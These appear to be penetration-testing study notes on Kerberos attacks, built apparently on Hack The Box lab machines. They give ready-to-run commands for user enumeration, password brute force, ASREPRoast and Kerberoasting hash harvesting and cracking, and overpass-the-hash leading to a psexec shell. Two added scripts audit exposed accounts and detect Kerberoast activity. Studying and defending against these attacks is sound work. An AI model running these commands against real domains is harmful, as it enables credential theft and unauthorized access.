
Kerberos Overview

Enum Commands

To enumerate users with nmap's built-in user list (the script's default):

nmap -p 88 --script=krb5-enum-users --script-args krb5-enum-users.realm='EGOTISTICALBANK' -oN "/root/cybersecurity/htb/boxes/10.10.10.175-sauna/scans/tcp_88_krb5-enum-users_nmap.txt" 10.10.10.175

To enumerate users with a custom user list:

nmap -p 88 --script=krb5-enum-users --script-args krb5-enum-users.realm='EGOTISTICALBANK',userdb=/root/cybersecurity/htb/boxes/10.10.10.175-sauna/users.txt -oN "/root/cybersecurity/htb/boxes/10.10.10.175-sauna/scans/tcp_88_krb5-enum-users_nmap.txt" 10.10.10.175

Kerberos Attacks

Kerberos Brute Force

The kerbrute tool (TarlogicSecurity/kerbrute on GitHub: a script that performs Kerberos brute-forcing using impacket) can be used to perform a brute-force attack from Kali. The tool can be installed with:

pip3 install kerbrute

To execute a brute-force attack against the Kerberos server:

kerbrute -dc-ip 10.10.10.182 -domain cascade.local -users users.txt -passwords /usr/share/wordlists/rockyou.utf8.txt -outputfile cascade_passwords.txt

Performing an ASREPRoast Attack

This attack looks for users that do not require Kerberos pre-authentication. For such users anyone can send an AS_REQ to the KDC on their behalf and receive an AS_REP message. The AS_REP contains a chunk of data encrypted with the user's long-term key, which is derived from the user's password, so the password can be cracked offline.

No domain account is required to perform this attack, only a connection to the KDC.
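The exposure here is a per-account setting: the DONT_REQ_PREAUTH bit in the userAccountControl attribute. The following audit script is an added example, not part of the original notes or of impacket; it decodes that attribute and lists enabled accounts that have pre-authentication disabled, which are exactly the accounts GetNPUsers.py would harvest. The account records are constructed sample data standing in for the (sAMAccountName, userAccountControl) pairs an LDAP query would return; the LDAP filter string is included so the same check can be run against a real directory.

```python
# Added example (not from the original notes): audit which accounts are
# exposed to ASREPRoast by decoding the userAccountControl attribute.

# userAccountControl bit flags (values from the AD schema documentation).
ACCOUNTDISABLE = 0x0002
DONT_REQ_PREAUTH = 0x400000

UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0200: "NORMAL_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x400000: "DONT_REQ_PREAUTH",
}

# Equivalent LDAP filter for a live query: enabled accounts with the
# DONT_REQ_PREAUTH bit set (1.2.840.113556.1.4.803 is the bitwise-AND rule).
LDAP_FILTER = (
    "(&(userAccountControl:1.2.840.113556.1.4.803:=4194304)"
    "(!(userAccountControl:1.2.840.113556.1.4.803:=2)))"
)

# Constructed sample records; not real directory data.
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "alice", "userAccountControl": 0x200},
    {"sAMAccountName": "svc_legacy", "userAccountControl": 0x200 | 0x10000 | 0x400000},
    {"sAMAccountName": "old_contractor", "userAccountControl": 0x200 | 0x2 | 0x400000},
]


def decode_uac(value: int) -> list:
    """Return the names of the known flags set in a userAccountControl value."""
    return [name for bit, name in UAC_FLAGS.items() if value & bit]


def find_asreproastable(accounts) -> list:
    """Enabled accounts with pre-authentication disabled: each one allows an
    unauthenticated AS_REP harvest and should have the flag cleared."""
    exposed = []
    for acct in accounts:
        uac = int(acct["userAccountControl"])
        if uac & DONT_REQ_PREAUTH and not uac & ACCOUNTDISABLE:
            exposed.append(acct["sAMAccountName"])
    return exposed


if __name__ == "__main__":
    for acct in SAMPLE_ACCOUNTS:
        print(acct["sAMAccountName"], decode_uac(acct["userAccountControl"]))
    print("pre-auth not required:", find_asreproastable(SAMPLE_ACCOUNTS))
```

Disabled accounts are skipped because the KDC rejects their AS_REQ anyway; the remediation for anything the script lists is to re-enable pre-authentication on the account, and a 4768 event with PreAuthType 0 is the corresponding detection lead.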

The impacket GetNPUsers.py script can be used to harvest the non-preauth AS_REP responses.

To run it with a username list:

python3 /var/lib/impacket/examples/GetNPUsers.py cascade.local/ -dc-ip 10.10.10.182 -no-pass -usersfile ../users.txt

If you have domain credentials, the script can query the domain for the user list itself and output the hashes in hashcat format:

python3 /var/lib/impacket/examples/GetNPUsers.py jurassic.park/triceratops:Sh4rpH0rns -dc-ip 10.10.10.182 -request -format hashcat -outputfile hashes.asreproast

Once the AS_REP messages are obtained we can crack them using Hashcat or John.

hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt

Kerberoasting

The goal of Kerberoasting is to harvest TGS tickets for services that run on behalf of user accounts in the AD environment. The only requirement is a domain account that can request TGSs, which in practice is any account, because no special privileges are required. Once again we will be using impacket scripts to execute this attack from Kali.

python GetUserSPNs.py jurassic.park/triceratops:Sh4rpH0rns -outputfile hashes.kerberoast

We then crack the TGS tickets with Hashcat or JtR.

hashcat -m 13100 --force -a 0 hashes.kerberoast passwords_kerb.txt
john --format=krb5tgs --wordlist=passwords_kerb.txt hashes.kerberoast
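On the detection side, each harvested ticket leaves a 4769 (Kerberos service ticket requested) event on the DC, and the crackable RC4 tickets show up with TicketEncryptionType 0x17. The script below is an added example, not part of the original notes or of any tool the notes mention: it parses constructed sample 4769 lines in a key=value export format (not real captured logs) and flags any requester that obtained RC4 service tickets for several distinct services within a short window, which is the burst pattern a GetUserSPNs.py run produces. The field names (TargetUserName, ServiceName, TicketEncryptionType, IpAddress) are the real 4769 EventData names; the line layout and threshold values are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample 4769 events, one per line (not real captured data).
SAMPLE_4769 = """\
2024-01-15T10:00:01 EventID=4769 TargetUserName=alice@CORP.LOCAL ServiceName=MSSQLSvc/sql01.corp.local TicketEncryptionType=0x12 IpAddress=10.0.0.5
2024-01-15T10:00:03 EventID=4769 TargetUserName=WS01$@CORP.LOCAL ServiceName=cifs/fs01.corp.local TicketEncryptionType=0x12 IpAddress=10.0.0.6
2024-01-15T10:05:00 EventID=4769 TargetUserName=bob@CORP.LOCAL ServiceName=MSSQLSvc/sql01.corp.local TicketEncryptionType=0x17 IpAddress=10.0.0.7
2024-01-15T10:05:01 EventID=4769 TargetUserName=bob@CORP.LOCAL ServiceName=HTTP/web01.corp.local TicketEncryptionType=0x17 IpAddress=10.0.0.7
2024-01-15T10:05:02 EventID=4769 TargetUserName=bob@CORP.LOCAL ServiceName=svc_backup TicketEncryptionType=0x17 IpAddress=10.0.0.7
2024-01-15T10:05:03 EventID=4769 TargetUserName=bob@CORP.LOCAL ServiceName=krbtgt TicketEncryptionType=0x17 IpAddress=10.0.0.7
2024-01-15T11:30:00 EventID=4769 TargetUserName=carol@CORP.LOCAL ServiceName=HTTP/legacyapp.corp.local TicketEncryptionType=0x17 IpAddress=10.0.0.8
"""

RC4_HMAC = 0x17  # etype 23; AES etypes are 0x11 and 0x12
FIELD_RE = re.compile(r"(\w+)=(\S+)")


def parse_4769(line):
    """Turn one exported event line into a dict; returns None for other events."""
    ts, _, rest = line.partition(" ")
    fields = dict(FIELD_RE.findall(rest))
    if fields.get("EventID") != "4769":
        return None
    fields["time"] = datetime.fromisoformat(ts)
    fields["etype"] = int(fields["TicketEncryptionType"], 16)
    return fields


def is_roastable_target(service):
    """Ignore the krbtgt service and machine accounts (name$): Kerberoasting
    is about service tickets for user accounts that carry an SPN."""
    return service.lower() != "krbtgt" and not service.endswith("$")


def detect_kerberoast(log_text, window=timedelta(minutes=5), threshold=3):
    """Flag requesters that obtained RC4 service tickets for at least
    `threshold` distinct services inside `window`.
    Returns {requester: sorted list of services}."""
    by_user = defaultdict(list)
    for line in log_text.splitlines():
        ev = parse_4769(line)
        if ev and ev["etype"] == RC4_HMAC and is_roastable_target(ev["ServiceName"]):
            by_user[ev["TargetUserName"]].append((ev["time"], ev["ServiceName"]))
    flagged = {}
    for user, reqs in by_user.items():
        reqs.sort()
        for i, (t0, _) in enumerate(reqs):
            in_window = {svc for t, svc in reqs[i:] if t - t0 <= window}
            if len(in_window) >= threshold:
                flagged[user] = sorted(in_window)
                break
    return flagged


if __name__ == "__main__":
    for user, services in detect_kerberoast(SAMPLE_4769).items():
        print(f"{user}: RC4 tickets for {len(services)} services: {services}")
```

A single RC4 request (carol above) is not flagged on its own, since legacy services still legitimately negotiate RC4; the burst of distinct SPNs from one account is the stronger signal, and moving service accounts to AES-only keys removes the cheap-to-crack RC4 tickets entirely.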

If you see this error when running from Linux:

Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)

it is caused by clock skew between your host and the DC (Kerberos rejects requests whose timestamp is too far from the KDC's time), so synchronize the host's clock with the DC:

ntpdate <IP of DC>

Overpass the Hash/Pass the Key (PTK)

This attack uses a user's NTLM hash to request Kerberos tickets, as an alternative to the common Pass the Hash over the NTLM protocol. It can therefore be especially useful in networks where NTLM is disabled and only Kerberos is allowed as the authentication protocol.

To perform this attack, the NTLM hash (or password) of the target user account is needed. Once a user hash is obtained, a TGT can be requested for that account, and with it any service or machine where the user account has permissions can be accessed. (I just used psexec.py in the example; something that might be better to pass the hash to would be a full shell like evil-winrm, if it's available.)

python3 /var/lib/impacket/examples/getTGT.py jurassic.park/velociraptor -hashes :2a3de7fe356ee524cc9f3d579f2e0aa7
export KRB5CCNAME=/root/impacket-examples/velociraptor.ccache
psexec.py jurassic.park/velociraptor@labwws02.jurassic.park -k -no-pass

After the TGT is generated and used, a shell is launched. The requested TGT can also be used with other impacket examples via the -k parameter, and even with other tools (such as smbexec.py or wmiexec.py), because it is written to a ccache file, a widely used format for Kerberos tickets on Linux.

Pass The Ticket (PTT)

This kind of attack is similar to Pass the Key, but instead of using hashes to request a ticket, the ticket itself is stolen and used to authenticate as its owner.

References

HTB Sauna / Kerberos PTH with Impacket's GetNPUsers

Kerberos (II): How to attack Kerberos?

Kerberos Cheatsheet: a cheatsheet with commands that can be used to perform Kerberos attacks (GitHub)